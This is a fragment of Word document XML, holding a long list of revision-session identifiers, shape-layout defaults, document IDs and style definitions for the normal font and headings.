    <w:rsid w:val="00107FB5"/>
    <w:rsid w:val="00110D9C"/>
    <w:rsid w:val="001151F5"/>
    <w:rsid w:val="0011743D"/>
    <w:rsid w:val="00121825"/>
    <w:rsid w:val="0012275F"/>
    <w:rsid w:val="00123784"/>
    <w:rsid w:val="00123C47"/>
    <w:rsid w:val="001315D9"/>
    <w:rsid w:val="00135438"/>
    <w:rsid w:val="00141571"/>
    <w:rsid w:val="0014742C"/>
    <w:rsid w:val="00150370"/>
    <w:rsid w:val="00152D4B"/>
    <w:rsid w:val="00161E87"/>
    <w:rsid w:val="00181C74"/>
    <w:rsid w:val="00184775"/>
    <w:rsid w:val="00197D3C"/>
    <w:rsid w:val="001A1680"/>
    <w:rsid w:val="001A214E"/>
    <w:rsid w:val="001A2273"/>
    <w:rsid w:val="001A7643"/>
    <w:rsid w:val="001A7C40"/>
    <w:rsid w:val="001B1F4F"/>
    <w:rsid w:val="001B26C6"/>
    <w:rsid w:val="001B7557"/>
    <w:rsid w:val="001C02DE"/>
    <w:rsid w:val="001C0971"/>
    <w:rsid w:val="001C3709"/>
    <w:rsid w:val="001C566A"/>
    <w:rsid w:val="001D1887"/>
    <w:rsid w:val="001D20B2"/>
    <w:rsid w:val="001D6344"/>
    <w:rsid w:val="001D6EF9"/>
    <w:rsid w:val="001E33A0"/>
    <w:rsid w:val="001E3DA0"/>
    <w:rsid w:val="001E3DA5"/>
    <w:rsid w:val="001E7135"/>
    <w:rsid w:val="001F1C94"/>
    <w:rsid w:val="001F25DF"/>
    <w:rsid w:val="001F25E2"/>
    <w:rsid w:val="001F27E0"/>
    <w:rsid w:val="001F3440"/>
    <w:rsid w:val="001F550A"/>
    <w:rsid w:val="0020075D"/>
    <w:rsid w:val="00210841"/>
    <w:rsid w:val="002162CB"/>
    <w:rsid w:val="00217CA1"/>
    <w:rsid w:val="00222643"/>
    <w:rsid w:val="00227DEC"/>
    <w:rsid w:val="00230479"/>
    <w:rsid w:val="002306A8"/>
    <w:rsid w:val="002332D8"/>
    <w:rsid w:val="00237FD5"/>
    <w:rsid w:val="002414BB"/>
    <w:rsid w:val="0024261E"/>
    <w:rsid w:val="00244438"/>
    <w:rsid w:val="002469AF"/>
    <w:rsid w:val="0024760C"/>
    <w:rsid w:val="00247C2E"/>
    <w:rsid w:val="00256D44"/>
    <w:rsid w:val="00260010"/>
    <w:rsid w:val="00260A40"/>
    <w:rsid w:val="002659CF"/>
    <w:rsid w:val="002719B7"/>
    <w:rsid w:val="00281E1F"/>
    <w:rsid w:val="002825CE"/>
    <w:rsid w:val="0028303B"/>
    <w:rsid w:val="002833D3"/>
    <w:rsid w:val="002841CA"/>
    <w:rsid w:val="00285B75"/>
    <w:rsid w:val="00293498"/>
    <w:rsid w:val="0029760C"/>
    <w:rsid w:val="002B21D1"/>
    <w:rsid w:val="002C0F59"/>
    <w:rsid w:val="002D2DA8"/>
    <w:rsid w:val="002D74D8"/>
    <w:rsid w:val="002E2027"/>
    <w:rsid w:val="002E4009"/>
    <w:rsid w:val="002E4258"/>
    <w:rsid w:val="002E726E"/>
    <w:rsid w:val="002F2296"/>
    <w:rsid w:val="002F4629"/>
    <w:rsid w:val="002F7D4F"/>
    <w:rsid w:val="00300491"/>
    <w:rsid w:val="0030342C"/>
    <w:rsid w:val="00310739"/>
    <w:rsid w:val="00312CD3"/>
    <w:rsid w:val="00317D2E"/>
    <w:rsid w:val="00321DA3"/>
    <w:rsid w:val="003221FD"/>
    <w:rsid w:val="0032293E"/>
    <w:rsid w:val="00331975"/>
    <w:rsid w:val="00331E2F"/>
    <w:rsid w:val="00334357"/>
    <w:rsid w:val="00334A97"/>
    <w:rsid w:val="00334AE3"/>
    <w:rsid w:val="0034703D"/>
    <w:rsid w:val="0035074F"/>
    <w:rsid w:val="00352288"/>
    <w:rsid w:val="003525CE"/>
    <w:rsid w:val="00352D13"/>
    <w:rsid w:val="00353B86"/>
    <w:rsid w:val="00354F00"/>
    <w:rsid w:val="00360634"/>
    <w:rsid w:val="0036519D"/>
    <w:rsid w:val="00376EDE"/>
    <w:rsid w:val="003775DD"/>
    <w:rsid w:val="00377E7C"/>
    <w:rsid w:val="00386D9D"/>
    <w:rsid w:val="003922D9"/>
    <w:rsid w:val="00394E1C"/>
    <w:rsid w:val="00395053"/>
    <w:rsid w:val="00396027"/>
    <w:rsid w:val="003A7D7F"/>
    <w:rsid w:val="003B2208"/>
    <w:rsid w:val="003B4BAB"/>
    <w:rsid w:val="003C1159"/>
    <w:rsid w:val="003C5627"/>
    <w:rsid w:val="003D15F9"/>
    <w:rsid w:val="003D355F"/>
    <w:rsid w:val="003D4A66"/>
    <w:rsid w:val="003E0048"/>
    <w:rsid w:val="003E25AD"/>
    <w:rsid w:val="003E77BA"/>
    <w:rsid w:val="003F4CB6"/>
    <w:rsid w:val="00402E0F"/>
    <w:rsid w:val="0040372E"/>
    <w:rsid w:val="004052DC"/>
    <w:rsid w:val="0040572F"/>
    <w:rsid w:val="00415780"/>
    <w:rsid w:val="00420DB4"/>
    <w:rsid w:val="00421B3F"/>
    <w:rsid w:val="00424634"/>
    <w:rsid w:val="0042640B"/>
    <w:rsid w:val="0043067F"/>
    <w:rsid w:val="00430C92"/>
    <w:rsid w:val="00431601"/>
    <w:rsid w:val="00431A06"/>
    <w:rsid w:val="00435F02"/>
    <w:rsid w:val="00436081"/>
    <w:rsid w:val="00436DBF"/>
    <w:rsid w:val="00437915"/>
    <w:rsid w:val="0044197D"/>
    <w:rsid w:val="00447FC9"/>
    <w:rsid w:val="00450971"/>
    <w:rsid w:val="00452BA5"/>
    <w:rsid w:val="00454611"/>
    <w:rsid w:val="004547E4"/>
    <w:rsid w:val="00455432"/>
    <w:rsid w:val="00455E18"/>
    <w:rsid w:val="004573F1"/>
    <w:rsid w:val="00461403"/>
    <w:rsid w:val="00462384"/>
    <w:rsid w:val="00464B39"/>
    <w:rsid w:val="0046632A"/>
    <w:rsid w:val="004672B3"/>
    <w:rsid w:val="00475BAA"/>
    <w:rsid w:val="004810DF"/>
    <w:rsid w:val="0048466C"/>
    <w:rsid w:val="00492705"/>
    <w:rsid w:val="004A19A5"/>
    <w:rsid w:val="004A4435"/>
    <w:rsid w:val="004A491C"/>
    <w:rsid w:val="004A5F23"/>
    <w:rsid w:val="004A6B86"/>
    <w:rsid w:val="004A7FA8"/>
    <w:rsid w:val="004B1176"/>
    <w:rsid w:val="004B287F"/>
    <w:rsid w:val="004B7B87"/>
    <w:rsid w:val="004C2CE5"/>
    <w:rsid w:val="004C580E"/>
    <w:rsid w:val="004C7659"/>
    <w:rsid w:val="004D5444"/>
    <w:rsid w:val="004D627B"/>
    <w:rsid w:val="004E03F7"/>
    <w:rsid w:val="004E20E7"/>
    <w:rsid w:val="004E3260"/>
    <w:rsid w:val="004E4354"/>
    <w:rsid w:val="004E6C1A"/>
    <w:rsid w:val="004E7277"/>
    <w:rsid w:val="004F25F4"/>
    <w:rsid w:val="004F4317"/>
    <w:rsid w:val="00502546"/>
    <w:rsid w:val="00506E74"/>
    <w:rsid w:val="00510F33"/>
    <w:rsid w:val="00511B60"/>
    <w:rsid w:val="005142EA"/>
    <w:rsid w:val="005200CC"/>
    <w:rsid w:val="00521103"/>
    <w:rsid w:val="0052181F"/>
    <w:rsid w:val="00522B12"/>
    <w:rsid w:val="0052380C"/>
    <w:rsid w:val="00533012"/>
    <w:rsid w:val="00534072"/>
    <w:rsid w:val="0054030B"/>
    <w:rsid w:val="00544303"/>
    <w:rsid w:val="00545A6B"/>
    <w:rsid w:val="00545F25"/>
    <w:rsid w:val="00547AEE"/>
    <w:rsid w:val="00552289"/>
    <w:rsid w:val="005716AA"/>
    <w:rsid w:val="00586449"/>
    <w:rsid w:val="005869B3"/>
    <w:rsid w:val="005878E8"/>
    <w:rsid w:val="00592170"/>
    <w:rsid w:val="005A2858"/>
    <w:rsid w:val="005A5D1B"/>
    <w:rsid w:val="005A6186"/>
    <w:rsid w:val="005A72DB"/>
    <w:rsid w:val="005B2553"/>
    <w:rsid w:val="005B3E25"/>
    <w:rsid w:val="005B4BFF"/>
    <w:rsid w:val="005B5EC2"/>
    <w:rsid w:val="005B74DC"/>
    <w:rsid w:val="005C0A14"/>
    <w:rsid w:val="005C5CC9"/>
    <w:rsid w:val="005C7617"/>
    <w:rsid w:val="005C7873"/>
    <w:rsid w:val="005D3CA1"/>
    <w:rsid w:val="005D4EE4"/>
    <w:rsid w:val="005D6713"/>
    <w:rsid w:val="005D690C"/>
    <w:rsid w:val="005D6A56"/>
    <w:rsid w:val="005E329B"/>
    <w:rsid w:val="005E4FC1"/>
    <w:rsid w:val="005F1AD4"/>
    <w:rsid w:val="005F1D19"/>
    <w:rsid w:val="005F59C2"/>
    <w:rsid w:val="0060222A"/>
    <w:rsid w:val="00605863"/>
    <w:rsid w:val="006060BA"/>
    <w:rsid w:val="0060698B"/>
    <w:rsid w:val="0061063C"/>
    <w:rsid w:val="006139FD"/>
    <w:rsid w:val="006160D0"/>
    <w:rsid w:val="006165D1"/>
    <w:rsid w:val="00620272"/>
    <w:rsid w:val="006246CE"/>
    <w:rsid w:val="00624BEF"/>
    <w:rsid w:val="006324EF"/>
    <w:rsid w:val="006332F6"/>
    <w:rsid w:val="00633E56"/>
    <w:rsid w:val="006431D4"/>
    <w:rsid w:val="00645AC8"/>
    <w:rsid w:val="00650507"/>
    <w:rsid w:val="0065122E"/>
    <w:rsid w:val="00653316"/>
    <w:rsid w:val="00662AB6"/>
    <w:rsid w:val="00664D6B"/>
    <w:rsid w:val="00667774"/>
    <w:rsid w:val="006709D0"/>
    <w:rsid w:val="00674DAB"/>
    <w:rsid w:val="00682BA2"/>
    <w:rsid w:val="00683908"/>
    <w:rsid w:val="006860F0"/>
    <w:rsid w:val="00687E52"/>
    <w:rsid w:val="00693288"/>
    <w:rsid w:val="00693758"/>
    <w:rsid w:val="006A72B8"/>
    <w:rsid w:val="006B03DB"/>
    <w:rsid w:val="006B2824"/>
    <w:rsid w:val="006B2FC3"/>
    <w:rsid w:val="006B47F6"/>
    <w:rsid w:val="006C1486"/>
    <w:rsid w:val="006C2186"/>
    <w:rsid w:val="006C341F"/>
    <w:rsid w:val="006C4885"/>
    <w:rsid w:val="006C5872"/>
    <w:rsid w:val="006D5B98"/>
    <w:rsid w:val="006F1077"/>
    <w:rsid w:val="006F1F0A"/>
    <w:rsid w:val="006F4532"/>
    <w:rsid w:val="0070245A"/>
    <w:rsid w:val="00705B56"/>
    <w:rsid w:val="007066DC"/>
    <w:rsid w:val="00706A92"/>
    <w:rsid w:val="007164C7"/>
    <w:rsid w:val="0071773C"/>
    <w:rsid w:val="00717F46"/>
    <w:rsid w:val="007234BC"/>
    <w:rsid w:val="0072492C"/>
    <w:rsid w:val="00730C19"/>
    <w:rsid w:val="00735DF5"/>
    <w:rsid w:val="00740159"/>
    <w:rsid w:val="00742AA9"/>
    <w:rsid w:val="00744015"/>
    <w:rsid w:val="007543DF"/>
    <w:rsid w:val="00754A98"/>
    <w:rsid w:val="00755DB7"/>
    <w:rsid w:val="007600B2"/>
    <w:rsid w:val="007614A8"/>
    <w:rsid w:val="00762EBC"/>
    <w:rsid w:val="00770BF8"/>
    <w:rsid w:val="00771345"/>
    <w:rsid w:val="00772AAA"/>
    <w:rsid w:val="00774159"/>
    <w:rsid w:val="0077508E"/>
    <w:rsid w:val="00775922"/>
    <w:rsid w:val="00776188"/>
    <w:rsid w:val="007766F6"/>
    <w:rsid w:val="007826BE"/>
    <w:rsid w:val="0079170C"/>
    <w:rsid w:val="00793E83"/>
    <w:rsid w:val="00796368"/>
    <w:rsid w:val="00797F19"/>
    <w:rsid w:val="007A1AFC"/>
    <w:rsid w:val="007A65E2"/>
    <w:rsid w:val="007A6A88"/>
    <w:rsid w:val="007A7C87"/>
    <w:rsid w:val="007B065F"/>
    <w:rsid w:val="007B2D0F"/>
    <w:rsid w:val="007B5B18"/>
    <w:rsid w:val="007C0D42"/>
    <w:rsid w:val="007C358E"/>
    <w:rsid w:val="007C3EAC"/>
    <w:rsid w:val="007C61AF"/>
    <w:rsid w:val="007D0000"/>
    <w:rsid w:val="007D0AAA"/>
    <w:rsid w:val="007D17E7"/>
    <w:rsid w:val="007D3687"/>
    <w:rsid w:val="007D4857"/>
    <w:rsid w:val="007D6F35"/>
    <w:rsid w:val="007E0839"/>
    <w:rsid w:val="007F00BD"/>
    <w:rsid w:val="007F0798"/>
    <w:rsid w:val="007F1789"/>
    <w:rsid w:val="007F2E0E"/>
    <w:rsid w:val="00804803"/>
    <w:rsid w:val="00804D38"/>
    <w:rsid w:val="00805FB9"/>
    <w:rsid w:val="0081295F"/>
    <w:rsid w:val="0081538E"/>
    <w:rsid w:val="00817306"/>
    <w:rsid w:val="0082244B"/>
    <w:rsid w:val="00827AE4"/>
    <w:rsid w:val="008312ED"/>
    <w:rsid w:val="0083229D"/>
    <w:rsid w:val="00833252"/>
    <w:rsid w:val="0083389E"/>
    <w:rsid w:val="00833CD4"/>
    <w:rsid w:val="00835B51"/>
    <w:rsid w:val="00835B99"/>
    <w:rsid w:val="00835D67"/>
    <w:rsid w:val="00840967"/>
    <w:rsid w:val="008415DC"/>
    <w:rsid w:val="0084255D"/>
    <w:rsid w:val="00847F16"/>
    <w:rsid w:val="00850072"/>
    <w:rsid w:val="00851316"/>
    <w:rsid w:val="00861282"/>
    <w:rsid w:val="0086611E"/>
    <w:rsid w:val="00867B4E"/>
    <w:rsid w:val="0087036B"/>
    <w:rsid w:val="008704BF"/>
    <w:rsid w:val="008719D3"/>
    <w:rsid w:val="00873435"/>
    <w:rsid w:val="008824CE"/>
    <w:rsid w:val="00884364"/>
    <w:rsid w:val="008917C0"/>
    <w:rsid w:val="008924DF"/>
    <w:rsid w:val="00896367"/>
    <w:rsid w:val="008A31E2"/>
    <w:rsid w:val="008B2022"/>
    <w:rsid w:val="008B6A40"/>
    <w:rsid w:val="008B749C"/>
    <w:rsid w:val="008C1CAF"/>
    <w:rsid w:val="008C48D5"/>
    <w:rsid w:val="008C7584"/>
    <w:rsid w:val="008D147B"/>
    <w:rsid w:val="008D5296"/>
    <w:rsid w:val="008E08B9"/>
    <w:rsid w:val="008E60EC"/>
    <w:rsid w:val="008E62DF"/>
    <w:rsid w:val="008E6F77"/>
    <w:rsid w:val="008F0507"/>
    <w:rsid w:val="008F1248"/>
    <w:rsid w:val="008F1A85"/>
    <w:rsid w:val="008F3E80"/>
    <w:rsid w:val="008F5270"/>
    <w:rsid w:val="008F5834"/>
    <w:rsid w:val="00901B52"/>
    <w:rsid w:val="009027DE"/>
    <w:rsid w:val="009064FA"/>
    <w:rsid w:val="00906699"/>
    <w:rsid w:val="009107BE"/>
    <w:rsid w:val="00912298"/>
    <w:rsid w:val="0091272A"/>
    <w:rsid w:val="0091465B"/>
    <w:rsid w:val="00920D2E"/>
    <w:rsid w:val="00922484"/>
    <w:rsid w:val="00922E1D"/>
    <w:rsid w:val="0092554E"/>
    <w:rsid w:val="00926F81"/>
    <w:rsid w:val="00934396"/>
    <w:rsid w:val="00935FC5"/>
    <w:rsid w:val="0093669F"/>
    <w:rsid w:val="00940A22"/>
    <w:rsid w:val="0094295D"/>
    <w:rsid w:val="0094305D"/>
    <w:rsid w:val="00944E19"/>
    <w:rsid w:val="00953119"/>
    <w:rsid w:val="0095372D"/>
    <w:rsid w:val="00960BC8"/>
    <w:rsid w:val="0096563F"/>
    <w:rsid w:val="00971005"/>
    <w:rsid w:val="0097174F"/>
    <w:rsid w:val="00975212"/>
    <w:rsid w:val="00975A57"/>
    <w:rsid w:val="00977BB1"/>
    <w:rsid w:val="00980D57"/>
    <w:rsid w:val="00982300"/>
    <w:rsid w:val="00984ACC"/>
    <w:rsid w:val="00985C47"/>
    <w:rsid w:val="0098792D"/>
    <w:rsid w:val="009936D9"/>
    <w:rsid w:val="009941F2"/>
    <w:rsid w:val="009944F9"/>
    <w:rsid w:val="00997BF5"/>
    <w:rsid w:val="009A08D6"/>
    <w:rsid w:val="009A20D5"/>
    <w:rsid w:val="009A41F8"/>
    <w:rsid w:val="009A5BBA"/>
    <w:rsid w:val="009A5C68"/>
    <w:rsid w:val="009B0863"/>
    <w:rsid w:val="009B37E2"/>
    <w:rsid w:val="009B51B4"/>
    <w:rsid w:val="009B528A"/>
    <w:rsid w:val="009B6184"/>
    <w:rsid w:val="009C022B"/>
    <w:rsid w:val="009C1F0F"/>
    <w:rsid w:val="009C5179"/>
    <w:rsid w:val="009C539D"/>
    <w:rsid w:val="009D5CCE"/>
    <w:rsid w:val="009D78C6"/>
    <w:rsid w:val="009E10B6"/>
    <w:rsid w:val="009E13AA"/>
    <w:rsid w:val="009E477C"/>
    <w:rsid w:val="009E57B3"/>
    <w:rsid w:val="009F4C6F"/>
    <w:rsid w:val="009F746C"/>
    <w:rsid w:val="009F7AFB"/>
    <w:rsid w:val="00A00445"/>
    <w:rsid w:val="00A00BDB"/>
    <w:rsid w:val="00A019C1"/>
    <w:rsid w:val="00A02800"/>
    <w:rsid w:val="00A0288A"/>
    <w:rsid w:val="00A03B93"/>
    <w:rsid w:val="00A05797"/>
    <w:rsid w:val="00A06141"/>
    <w:rsid w:val="00A1020C"/>
    <w:rsid w:val="00A22BE5"/>
    <w:rsid w:val="00A250EB"/>
    <w:rsid w:val="00A34614"/>
    <w:rsid w:val="00A3617D"/>
    <w:rsid w:val="00A42012"/>
    <w:rsid w:val="00A454B1"/>
    <w:rsid w:val="00A47F1B"/>
    <w:rsid w:val="00A5052D"/>
    <w:rsid w:val="00A545BF"/>
    <w:rsid w:val="00A55198"/>
    <w:rsid w:val="00A55409"/>
    <w:rsid w:val="00A5661E"/>
    <w:rsid w:val="00A66892"/>
    <w:rsid w:val="00A736FC"/>
    <w:rsid w:val="00A815C8"/>
    <w:rsid w:val="00A83733"/>
    <w:rsid w:val="00A905F3"/>
    <w:rsid w:val="00A92BB1"/>
    <w:rsid w:val="00A940D6"/>
    <w:rsid w:val="00A94E9E"/>
    <w:rsid w:val="00AA07E0"/>
    <w:rsid w:val="00AA138B"/>
    <w:rsid w:val="00AA48DB"/>
    <w:rsid w:val="00AA6D5C"/>
    <w:rsid w:val="00AA73D1"/>
    <w:rsid w:val="00AB19EF"/>
    <w:rsid w:val="00AC18D3"/>
    <w:rsid w:val="00AC3096"/>
    <w:rsid w:val="00AD0B02"/>
    <w:rsid w:val="00AD1A16"/>
    <w:rsid w:val="00AD4137"/>
    <w:rsid w:val="00AE25DC"/>
    <w:rsid w:val="00AE286A"/>
    <w:rsid w:val="00AE3863"/>
    <w:rsid w:val="00AE4491"/>
    <w:rsid w:val="00AE65EE"/>
    <w:rsid w:val="00AF2349"/>
    <w:rsid w:val="00AF7D33"/>
    <w:rsid w:val="00B05B09"/>
    <w:rsid w:val="00B10E79"/>
    <w:rsid w:val="00B11281"/>
    <w:rsid w:val="00B12653"/>
    <w:rsid w:val="00B13939"/>
    <w:rsid w:val="00B24DB9"/>
    <w:rsid w:val="00B323BE"/>
    <w:rsid w:val="00B33AA6"/>
    <w:rsid w:val="00B34FB7"/>
    <w:rsid w:val="00B37CE7"/>
    <w:rsid w:val="00B41521"/>
    <w:rsid w:val="00B4489B"/>
    <w:rsid w:val="00B5070C"/>
    <w:rsid w:val="00B52042"/>
    <w:rsid w:val="00B607D2"/>
    <w:rsid w:val="00B67852"/>
    <w:rsid w:val="00B67D36"/>
    <w:rsid w:val="00B73881"/>
    <w:rsid w:val="00B74239"/>
    <w:rsid w:val="00B778E8"/>
    <w:rsid w:val="00B82303"/>
    <w:rsid w:val="00B83209"/>
    <w:rsid w:val="00B84B7F"/>
    <w:rsid w:val="00B8779F"/>
    <w:rsid w:val="00BA1C7A"/>
    <w:rsid w:val="00BA5359"/>
    <w:rsid w:val="00BB073A"/>
    <w:rsid w:val="00BB0893"/>
    <w:rsid w:val="00BB2E12"/>
    <w:rsid w:val="00BB2E4E"/>
    <w:rsid w:val="00BB5381"/>
    <w:rsid w:val="00BB621D"/>
    <w:rsid w:val="00BB7311"/>
    <w:rsid w:val="00BC2486"/>
    <w:rsid w:val="00BC4E5E"/>
    <w:rsid w:val="00BC5FDF"/>
    <w:rsid w:val="00BC6EA3"/>
    <w:rsid w:val="00BD577B"/>
    <w:rsid w:val="00BD5F60"/>
    <w:rsid w:val="00BD7C35"/>
    <w:rsid w:val="00BE4648"/>
    <w:rsid w:val="00BE710C"/>
    <w:rsid w:val="00BF500B"/>
    <w:rsid w:val="00C003E9"/>
    <w:rsid w:val="00C06372"/>
    <w:rsid w:val="00C079B2"/>
    <w:rsid w:val="00C14ABF"/>
    <w:rsid w:val="00C15542"/>
    <w:rsid w:val="00C22B9D"/>
    <w:rsid w:val="00C23226"/>
    <w:rsid w:val="00C25AA0"/>
    <w:rsid w:val="00C267EF"/>
    <w:rsid w:val="00C26BD2"/>
    <w:rsid w:val="00C34D54"/>
    <w:rsid w:val="00C41698"/>
    <w:rsid w:val="00C418EC"/>
    <w:rsid w:val="00C44036"/>
    <w:rsid w:val="00C47F6A"/>
    <w:rsid w:val="00C517BA"/>
    <w:rsid w:val="00C57B37"/>
    <w:rsid w:val="00C57F2F"/>
    <w:rsid w:val="00C633A6"/>
    <w:rsid w:val="00C64C44"/>
    <w:rsid w:val="00C72478"/>
    <w:rsid w:val="00C76C32"/>
    <w:rsid w:val="00C820C6"/>
    <w:rsid w:val="00C83162"/>
    <w:rsid w:val="00C90D26"/>
    <w:rsid w:val="00C93ECC"/>
    <w:rsid w:val="00C96E0E"/>
    <w:rsid w:val="00CA0FAB"/>
    <w:rsid w:val="00CA5C82"/>
    <w:rsid w:val="00CA7C54"/>
    <w:rsid w:val="00CB4828"/>
    <w:rsid w:val="00CB5FA1"/>
    <w:rsid w:val="00CB6A8E"/>
    <w:rsid w:val="00CC16B4"/>
    <w:rsid w:val="00CC660C"/>
    <w:rsid w:val="00CD0559"/>
    <w:rsid w:val="00CD1156"/>
    <w:rsid w:val="00CD12C9"/>
    <w:rsid w:val="00CD307E"/>
    <w:rsid w:val="00CD326E"/>
    <w:rsid w:val="00CD46A5"/>
    <w:rsid w:val="00CD5012"/>
    <w:rsid w:val="00CE194A"/>
    <w:rsid w:val="00CE3571"/>
    <w:rsid w:val="00CE3747"/>
    <w:rsid w:val="00CF17BF"/>
    <w:rsid w:val="00D00D57"/>
    <w:rsid w:val="00D028A3"/>
    <w:rsid w:val="00D0342A"/>
    <w:rsid w:val="00D075EC"/>
    <w:rsid w:val="00D07636"/>
    <w:rsid w:val="00D1297A"/>
    <w:rsid w:val="00D12A81"/>
    <w:rsid w:val="00D17725"/>
    <w:rsid w:val="00D202DF"/>
    <w:rsid w:val="00D20C70"/>
    <w:rsid w:val="00D2185B"/>
    <w:rsid w:val="00D458D5"/>
    <w:rsid w:val="00D501FD"/>
    <w:rsid w:val="00D51940"/>
    <w:rsid w:val="00D524F5"/>
    <w:rsid w:val="00D603FC"/>
    <w:rsid w:val="00D60CDF"/>
    <w:rsid w:val="00D64661"/>
    <w:rsid w:val="00D64F3B"/>
    <w:rsid w:val="00D7561B"/>
    <w:rsid w:val="00D7688E"/>
    <w:rsid w:val="00D810A3"/>
    <w:rsid w:val="00D83C47"/>
    <w:rsid w:val="00D879B8"/>
    <w:rsid w:val="00D90D62"/>
    <w:rsid w:val="00D945FD"/>
    <w:rsid w:val="00DA140F"/>
    <w:rsid w:val="00DA1E4E"/>
    <w:rsid w:val="00DA2FF8"/>
    <w:rsid w:val="00DA390A"/>
    <w:rsid w:val="00DA72F2"/>
    <w:rsid w:val="00DB064B"/>
    <w:rsid w:val="00DB49C6"/>
    <w:rsid w:val="00DB59B4"/>
    <w:rsid w:val="00DC0962"/>
    <w:rsid w:val="00DC10C4"/>
    <w:rsid w:val="00DC1E13"/>
    <w:rsid w:val="00DC1E65"/>
    <w:rsid w:val="00DC462C"/>
    <w:rsid w:val="00DC6944"/>
    <w:rsid w:val="00DD16BC"/>
    <w:rsid w:val="00DD1867"/>
    <w:rsid w:val="00DD1E52"/>
    <w:rsid w:val="00DD559B"/>
    <w:rsid w:val="00DD7446"/>
    <w:rsid w:val="00DE2A74"/>
    <w:rsid w:val="00DF2191"/>
    <w:rsid w:val="00DF24B6"/>
    <w:rsid w:val="00DF2A00"/>
    <w:rsid w:val="00DF315A"/>
    <w:rsid w:val="00DF5649"/>
    <w:rsid w:val="00DF5816"/>
    <w:rsid w:val="00DF6964"/>
    <w:rsid w:val="00DF7E4F"/>
    <w:rsid w:val="00E01E98"/>
    <w:rsid w:val="00E0481E"/>
    <w:rsid w:val="00E075BA"/>
    <w:rsid w:val="00E10B00"/>
    <w:rsid w:val="00E11829"/>
    <w:rsid w:val="00E12B41"/>
    <w:rsid w:val="00E16AE2"/>
    <w:rsid w:val="00E20329"/>
    <w:rsid w:val="00E2101F"/>
    <w:rsid w:val="00E23BE1"/>
    <w:rsid w:val="00E2485A"/>
    <w:rsid w:val="00E30701"/>
    <w:rsid w:val="00E31569"/>
    <w:rsid w:val="00E3234A"/>
    <w:rsid w:val="00E35556"/>
    <w:rsid w:val="00E379BA"/>
    <w:rsid w:val="00E41113"/>
    <w:rsid w:val="00E41D51"/>
    <w:rsid w:val="00E43668"/>
    <w:rsid w:val="00E444A5"/>
    <w:rsid w:val="00E453C4"/>
    <w:rsid w:val="00E456FC"/>
    <w:rsid w:val="00E4742A"/>
    <w:rsid w:val="00E5111C"/>
    <w:rsid w:val="00E60B6C"/>
    <w:rsid w:val="00E612AF"/>
    <w:rsid w:val="00E662BC"/>
    <w:rsid w:val="00E7060A"/>
    <w:rsid w:val="00E713A0"/>
    <w:rsid w:val="00E746D2"/>
    <w:rsid w:val="00E85E41"/>
    <w:rsid w:val="00E87960"/>
    <w:rsid w:val="00E87B3F"/>
    <w:rsid w:val="00E92595"/>
    <w:rsid w:val="00E93B6C"/>
    <w:rsid w:val="00EA3603"/>
    <w:rsid w:val="00EA3B3E"/>
    <w:rsid w:val="00EA5040"/>
    <w:rsid w:val="00EA5492"/>
    <w:rsid w:val="00EA70AC"/>
    <w:rsid w:val="00EB1752"/>
    <w:rsid w:val="00EB2849"/>
    <w:rsid w:val="00EB6145"/>
    <w:rsid w:val="00EB6AD5"/>
    <w:rsid w:val="00EC559F"/>
    <w:rsid w:val="00EC73C0"/>
    <w:rsid w:val="00ED407D"/>
    <w:rsid w:val="00ED67C4"/>
    <w:rsid w:val="00EE72EC"/>
    <w:rsid w:val="00EE7820"/>
    <w:rsid w:val="00EF0A7A"/>
    <w:rsid w:val="00EF5690"/>
    <w:rsid w:val="00EF67CC"/>
    <w:rsid w:val="00EF78F7"/>
    <w:rsid w:val="00F01595"/>
    <w:rsid w:val="00F02874"/>
    <w:rsid w:val="00F05F2C"/>
    <w:rsid w:val="00F065E4"/>
    <w:rsid w:val="00F06D91"/>
    <w:rsid w:val="00F1199F"/>
    <w:rsid w:val="00F15A70"/>
    <w:rsid w:val="00F17688"/>
    <w:rsid w:val="00F25AA5"/>
    <w:rsid w:val="00F415C8"/>
    <w:rsid w:val="00F4340F"/>
    <w:rsid w:val="00F43800"/>
    <w:rsid w:val="00F450DE"/>
    <w:rsid w:val="00F573F3"/>
    <w:rsid w:val="00F63A7E"/>
    <w:rsid w:val="00F63F09"/>
    <w:rsid w:val="00F660B1"/>
    <w:rsid w:val="00F673F8"/>
    <w:rsid w:val="00F74065"/>
    <w:rsid w:val="00F74A6A"/>
    <w:rsid w:val="00F81762"/>
    <w:rsid w:val="00F821F1"/>
    <w:rsid w:val="00F843AC"/>
    <w:rsid w:val="00F852A8"/>
    <w:rsid w:val="00F90273"/>
    <w:rsid w:val="00F9392D"/>
    <w:rsid w:val="00F94998"/>
    <w:rsid w:val="00FA29A7"/>
    <w:rsid w:val="00FA7438"/>
    <w:rsid w:val="00FA7B2E"/>
    <w:rsid w:val="00FB1B5A"/>
    <w:rsid w:val="00FB44AE"/>
    <w:rsid w:val="00FD119D"/>
    <w:rsid w:val="00FD5528"/>
    <w:rsid w:val="00FE61A3"/>
    <w:rsid w:val="00FF1351"/>
    <w:rsid w:val="00FF1C2D"/>
    <w:rsid w:val="00FF1EC8"/>
    <w:rsid w:val="00FF2908"/>
    <w:rsid w:val="00FF53E3"/>
    <w:rsid w:val="00FF5964"/>
    <w:rsid w:val="00FF6C32"/>
    <w:rsid w:val="00FF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
    </o:shapedefaults>
    <o:shapelayout v:ext="edit">
      <o:idmap v:ext="edit" data="1"/>
    </o:shapelayout>
  </w:shapeDefaults>
  <w:decimalSymbol w:val="."/>
  <w:listSeparator w:val=","/>
  <w14:docId w14:val="3765A7D8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A2832D9D-CD5D-447B-81E2-6267D93B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
    <w:qFormat/>
    <w:rsid w:val="00247C2E"/>
    <w:rPr>
      <w:rFonts w:ascii="Book Antiqua" w:hAnsi="Book Antiqua"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="003221FD"/>
    <w:pPr>
      <w:keepNext/>
      <w:pageBreakBefore/>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E4258"/>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2E4258"/>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2E4258"/>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2E4258"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
